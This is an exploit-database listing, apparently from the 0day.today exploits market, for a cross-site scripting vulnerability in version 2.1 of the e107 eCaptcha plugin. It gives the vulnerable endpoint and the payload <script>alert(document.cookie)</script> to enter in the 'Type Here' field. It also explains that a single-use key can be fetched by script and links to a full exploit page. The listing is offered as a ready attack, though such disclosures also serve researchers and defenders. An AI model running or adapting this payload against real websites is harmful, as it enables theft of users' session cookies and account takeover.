[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

e107 eCaptcha plugin 2.1 xss

Author
MustLive
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9871
Category
web applications
Date add
28-09-2009
Platform
unsorted
============================
e107 eCaptcha plugin 2.1 xss
============================

XSS:
 
POST query at page
http://site/path/ecaptcha/?key=b7c9bf99e763252105f047a5ca5681d0
 
<script>alert(document.cookie)</script>
in field: Type Here.
 
Working key (ecaptcha_key) is required, which can be retrieved by script.
Every key works only for one time.
 
Exploit:
 
http://websecurity.com.ua/uploads/2008/eCaptcha%20XSS.html
 

#  0day.today [2024-12-24]  #